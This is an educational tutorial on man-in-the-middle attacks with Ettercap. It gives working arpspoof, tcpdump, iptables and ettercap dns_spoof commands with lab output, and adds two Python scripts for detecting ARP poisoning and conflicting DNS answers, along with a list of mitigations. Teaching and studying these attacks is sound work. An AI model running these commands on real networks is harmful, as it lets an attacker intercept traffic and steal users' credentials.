
MITM attack using Ettercap

An educational look into Man-in-the-Middle attacks using ARP poisoning and DNS hijacking.


Ettercap is a MITM (Man-in-the-Middle) attack suite with a wide range of plugins supporting different attack techniques. This article focuses on a simple ARP poisoning and DNS hijacking attack. For this to work, the involved devices must share Layer 2 connectivity.

Credit: The Ettercap Project

Warning
This article is for educational purposes only. Performing MITM attacks on networks without explicit authorization is illegal and unethical. Only practice these techniques in controlled lab environments that you own or have permission to test.

The Man-in-the-Middle attack

The principle of a MITM attack is to insert an attacker into a network or communication path and make the targets believe that it is a legitimate part of the communication relay. There are several different methods to achieve this “trusted imposter” status, many of which are available as plugins in ettercap. This article focuses on two such methods: ARP poisoning and DNS hijacking.

ARP poisoning

ARP (Address Resolution Protocol) is used by devices to map IP addresses to MAC addresses on the local network (layer 2). When a device wants to communicate with another device it broadcasts an ARP request asking “Who has this IP address?”. The device currently assigned that address responds with its MAC address. The first device stores that mapping in its ARP cache and uses it to communicate directly with the target device.

ARP poisoning is performed by continuously sending forged ARP responses to a target device, causing it to update its ARP cache with incorrect IP-to-MAC mappings. As a result, the target device sends traffic intended for another host to the attacker’s device instead.

To illustrate this, consider two devices connected to a router. The first device is the target: an Ubuntu client with the IP address 192.168.1.116. The second device is the attacker: a Kali Linux client with the IP address 192.168.1.112. The default gateway of the network is 192.168.1.1.


The first thing we need to do in preparation is to enable IP forwarding in Kali. Otherwise we’ll just break the Ubuntu client’s connection instead of relaying it.

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Now that preparations are complete, we will demonstrate the ARP poisoning by using the command-line tool arpspoof to trick the Ubuntu client into believing that the Kali machine is the default gateway.

sudo arpspoof -i <the interface on the kali machine> -t <target host ip> <ip to impersonate>

Applying the information provided earlier we get this command.

sudo arpspoof -i eth0 -t 192.168.1.116 192.168.1.1

The command sends forged ARP replies to the target 192.168.1.116, associating the gateway IP 192.168.1.1 with the attacker’s MAC address. The output will look something like this.

┌──(lab㉿kali-client-01)-[~]
└─$ sudo arpspoof -i eth0 -t 192.168.1.116 192.168.1.1
bc:24:11:dc:11:a9 bc:24:11:78:13:2a 0806 42: arp reply 192.168.1.1 is-at bc:24:11:dc:11:a9
bc:24:11:dc:11:a9 bc:24:11:78:13:2a 0806 42: arp reply 192.168.1.1 is-at bc:24:11:dc:11:a9
bc:24:11:dc:11:a9 bc:24:11:78:13:2a 0806 42: arp reply 192.168.1.1 is-at bc:24:11:dc:11:a9
bc:24:11:dc:11:a9 bc:24:11:78:13:2a 0806 42: arp reply 192.168.1.1 is-at bc:24:11:dc:11:a9
bc:24:11:dc:11:a9 bc:24:11:78:13:2a 0806 42: arp reply 192.168.1.1 is-at bc:24:11:dc:11:a9

Now we can check if the Ubuntu client has picked up the spoofed address using the arp command-line tool.

lab@ubuntu-client-01:~$ arp -a
router.lab (192.168.1.1) at bc:24:11:dc:11:a9 [ether] on ens18
ubuntu-client-01-1.lab (192.168.1.112) at bc:24:11:dc:11:a9 [ether] on ens18
ns.lab (192.168.1.2) at bc:24:11:8d:34:4d [ether] on ens18

Right now only one direction is being poisoned. For a full MITM setup we need to poison the gateway as well; this ensures that traffic flows through the attacker in both directions instead of just breaking connectivity.

On the Kali Linux client we run another arpspoof instance in a separate terminal.

sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.116

To make sure that the MITM attack actually worked we’ll run a tcpdump on the Kali client and listen for tcp-syn packets.

sudo tcpdump -i eth0 -nn 'src 192.168.1.116 and tcp[tcpflags] == tcp-syn'

As soon as the dump is set up and listening we open a browser and enter google.com. If everything is set up correctly it will result in the following output.

┌──(lab㉿kali-client-01)-[~]
└─$ sudo tcpdump -i eth0 -nn 'src 192.168.1.116 and tcp[tcpflags] == tcp-syn'
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
21:37:14.052540 IP 192.168.1.116.52546 > 104.20.23.154.80: Flags [S], seq 844398196, win 64240, options [mss 1460,sackOK,TS val 1709947829 ecr 0,nop,wscale 9], length 0
21:37:14.052602 IP 192.168.1.116.52546 > 104.20.23.154.80: Flags [S], seq 844398196, win 64240, options [mss 1460,sackOK,TS val 1709947829 ecr 0,nop,wscale 9], length 0

The duplicate packets observed in the capture are caused by the attacker forwarding traffic between the victim and the gateway. Since tcpdump captures packets both when they arrive and when they are forwarded, each packet appears twice.
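From the defender’s side, the arp -a listing shown earlier already contains the footprint of the attack: the gateway 192.168.1.1 and the Kali host 192.168.1.112 resolve to the same MAC. The following Python script is an added example, not part of the original article or of Ettercap, that parses such a listing and flags any MAC answering for more than one IP, or a gateway entry whose MAC differs from a known-good value. The sample ARP output is the listing from the poisoned Ubuntu client above; the KNOWN_GOOD_GATEWAY_MAC value is a constructed placeholder, since the router’s real MAC does not appear in the article.

```python
import re
import sys
from collections import defaultdict

# Constructed sample: the `arp -a` output from the poisoned Ubuntu client in the lab.
POISONED_ARP_OUTPUT = """\
router.lab (192.168.1.1) at bc:24:11:dc:11:a9 [ether] on ens18
ubuntu-client-01-1.lab (192.168.1.112) at bc:24:11:dc:11:a9 [ether] on ens18
ns.lab (192.168.1.2) at bc:24:11:8d:34:4d [ether] on ens18
"""

# Constructed placeholder: the router's real MAC is not part of the article.
KNOWN_GOOD_GATEWAY_MAC = "aa:bb:cc:dd:ee:01"
GATEWAY_IP = "192.168.1.1"

# Matches one line of Linux `arp -a` (net-tools) output. Unresolved hosts show as
# '?', and '<incomplete>' entries carry no MAC and therefore do not match.
ARP_LINE = re.compile(
    r"^(?P<host>\S+)\s+\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)\s+at\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\s+\[ether\]\s+on\s+(?P<iface>\S+)$",
    re.IGNORECASE,
)


def parse_arp_table(text):
    """Parse `arp -a` output into a list of (ip, mac, iface) tuples."""
    entries = []
    for line in text.splitlines():
        m = ARP_LINE.match(line.strip())
        if m:
            entries.append((m["ip"], m["mac"].lower(), m["iface"]))
    return entries


def shared_macs(entries):
    """Return {mac: [ips]} for every MAC that answers for more than one IP.
    One MAC claiming two IPs is the classic footprint of ARP poisoning."""
    by_mac = defaultdict(list)
    for ip, mac, _iface in entries:
        by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_is_poisoned(entries, gateway_ip, expected_mac=None):
    """True if the gateway's cached MAC is shared with another host, or, when a
    known-good MAC is supplied, differs from it."""
    gw_macs = {mac for ip, mac, _iface in entries if ip == gateway_ip}
    if not gw_macs:
        return False  # gateway not in the cache yet; nothing to judge
    if expected_mac is not None and gw_macs != {expected_mac.lower()}:
        return True
    return any(gateway_ip in ips for ips in shared_macs(entries).values())


def report(text, gateway_ip, expected_mac=None):
    """Return a list of human-readable findings for the given ARP listing."""
    entries = parse_arp_table(text)
    findings = [f"MAC {mac} answers for {', '.join(ips)}"
                for mac, ips in shared_macs(entries).items()]
    if gateway_is_poisoned(entries, gateway_ip, expected_mac):
        findings.append(f"gateway {gateway_ip} mapping looks poisoned")
    return findings


if __name__ == "__main__":
    # Pipe a live table in (`arp -a | python3 arp_check.py`) or fall back to the sample.
    source = sys.stdin.read() if not sys.stdin.isatty() else POISONED_ARP_OUTPUT
    for finding in report(source, GATEWAY_IP, KNOWN_GOOD_GATEWAY_MAC):
        print("ALERT:", finding)
```

Run periodically on the client, or feed it the output of a switch’s MAC table, and the duplicate-MAC rule alone catches the lab attack; pinning the gateway MAC additionally catches a poisoning where the attacker is not otherwise in the cache. Tools such as arpwatch automate the same comparison over time.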

Using Ettercap

So far, we have successfully performed an ARP poisoning attack and can observe the network traffic of the target device. The next step in a successful MITM attack is to redirect the target to an attacker-controlled endpoint, where sensitive information such as login credentials can be captured.

DNS hijacking

DNS (Domain Name System) is used by devices to resolve domain names to IP addresses on a network or the internet. Similar to ARP, a device sends a request asking for the IP address associated with a domain name. Unlike ARP, this request is not broadcast but sent directly to a configured DNS server. In this attack, the request is intercepted and a malicious response is returned instead of the legitimate one.

First we need to configure elevated permissions for ettercap; we do so by modifying the main configuration file.

sudo vim /etc/ettercap/etter.conf

Replace the existing values with 0, which is root.

[privs]
ec_uid = 0
ec_gid = 0

Next we need to tell ettercap which requests it should intercept and replace. This is done in ettercap’s DNS configuration file.

sudo vim /etc/ettercap/etter.dns

Here we create an A record for a make-believe hijacked webpage called highjacked.example.com, pointing it at the attacker’s IP.

highjacked.example.com  A   192.168.1.112

Optionally block responses from the gateway in order to avoid race-conditions between spoofed and legitimate DNS responses. Run the following iptables command on the Kali Linux machine.

iptables -A FORWARD -p udp --dport 53 -j DROP

We will want to serve a webpage when the target accesses our hijacked domain. In order to do so we start an instance of an apache2 webserver.

service apache2 start

Now we are ready to execute the actual attack. The command is very similar to the one we used with arpspoof with the addition of the dns_spoof plugin.

sudo ettercap -T -q -i <interface> -M arp:remote //<target IP>// //<gateway IP>// -P <plugin name>
  • -T launches ettercap in text mode (no GUI)
  • -q reduces the output from ettercap for easier following
  • -i specifies the interface to run the attack on
  • -M arp:remote performs a bidirectional ARP MITM between the two targets
  • -P specifies which plugins to load

Here’s the command using the information of our environment.

sudo ettercap -T -q -i eth0 -M arp:remote //192.168.1.116// //192.168.1.1// -P dns_spoof

Finally we open a browser on the Ubuntu machine and enter our URL highjacked.example.com into the address bar. What appears in front of us is the default page of an unconfigured apache2 webserver. The attack succeeded and we redirected the target to our webpage.


Note
Obtaining a valid TLS certificate for a domain not controlled by the attacker is significantly more difficult than performing a simple MITM attack. Therefore, a Not Secure indicator in the browser’s address bar should not be ignored, especially when it appears on well-known or trusted websites.
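The race condition mentioned alongside the iptables rule is also a detection opportunity for the defender: without that rule, the client receives two answers to a single query, the spoofed one and the legitimate one, and they disagree. The following Python script is an added example, not part of the article or of Ettercap, that parses raw DNS response messages (header, question section, A-record answers including compressed names) and reports transaction IDs that received conflicting answers. The packets are constructed inline: 203.0.113.10 stands in for a legitimate answer, 192.168.1.112 is the attacker’s address from the lab above, and the transaction IDs are arbitrary.

```python
import struct
from collections import defaultdict


def encode_name(name):
    """Encode a dotted name as DNS labels (length-prefixed, zero-terminated)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_a_response(txid, qname, ip, ttl=300):
    """Constructed test data: a minimal DNS response with one A record answer.
    Flags 0x8180 = standard response, recursion desired/available, no error."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)  # QTYPE A, QCLASS IN
    rdata = bytes(int(octet) for octet in ip.split("."))
    # The answer name is a compression pointer (0xC00C) back to the question name.
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + answer


def decode_name(msg, offset):
    """Decode a possibly compressed name; return (name, offset after the name)."""
    labels = []
    jumped = False
    end = offset
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:  # compression pointer
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2  # the name occupies 2 bytes at the original position
            jumped = True
            offset = pointer
            continue
        if length == 0:
            offset += 1
            break
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    if not jumped:
        end = offset
    return ".".join(labels), end


def parse_a_response(msg):
    """Return (txid, qname, [A-record IPs]) from a raw DNS response message."""
    txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    qname = None
    for _ in range(qdcount):
        qname, off = decode_name(msg, off)
        off += 4  # skip QTYPE and QCLASS
    ips = []
    for _ in range(ancount):
        _name, off = decode_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(".".join(str(b) for b in msg[off:off + 4]))
        off += rdlen
    return txid, qname, ips


def find_conflicting_answers(responses):
    """Group responses by (txid, qname) and return the groups whose A records
    disagree. A spoofed reply racing the legitimate one produces exactly this:
    two responses to one query carrying different addresses."""
    seen = defaultdict(list)
    for pkt in responses:
        txid, qname, ips = parse_a_response(pkt)
        seen[(txid, qname)].append(tuple(sorted(ips)))
    return {key: sorted(set(answers)) for key, answers in seen.items()
            if len(set(answers)) > 1}


if __name__ == "__main__":
    # Constructed capture: a legitimate answer and a spoofed one for the same query.
    capture = [
        build_a_response(0x1234, "www.example.com", "203.0.113.10"),
        build_a_response(0x1234, "www.example.com", "192.168.1.112"),
        build_a_response(0x5678, "ns.lab", "192.168.1.2"),
    ]
    for (txid, qname), answers in find_conflicting_answers(capture).items():
        print(f"ALERT: txid {txid:#06x} {qname} got conflicting answers: {answers}")
```

In a real sensor the packets would come from a UDP/53 capture on the client or a mirror port. The check depends on seeing both responses; the FORWARD DROP rule used in the attack suppresses the legitimate one, so a passive monitor should additionally alert on queries that never receive an answer from the configured resolver and on public names that resolve into the local subnet. Resolving over DoH or DoT, as noted under mitigation, removes the plaintext path this spoof relies on.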

Mitigation Strategies

While the demonstrated attack was effective in a controlled environment, several mechanisms can be employed to defend against it.

At the network layer, ARP poisoning can be mitigated through the use of static ARP entries or Dynamic ARP Inspection (DAI), which prevent spoofed ARP messages and stop attackers from inserting themselves into communication paths.

For DNS, encrypted protocols such as DNS over HTTPS (DoH) and DNS over TLS (DoT) protect queries and responses from interception or manipulation.

Finally, the use of HTTPS and proper certificate validation ensures that even if traffic is intercepted, it cannot be read or modified without detection.
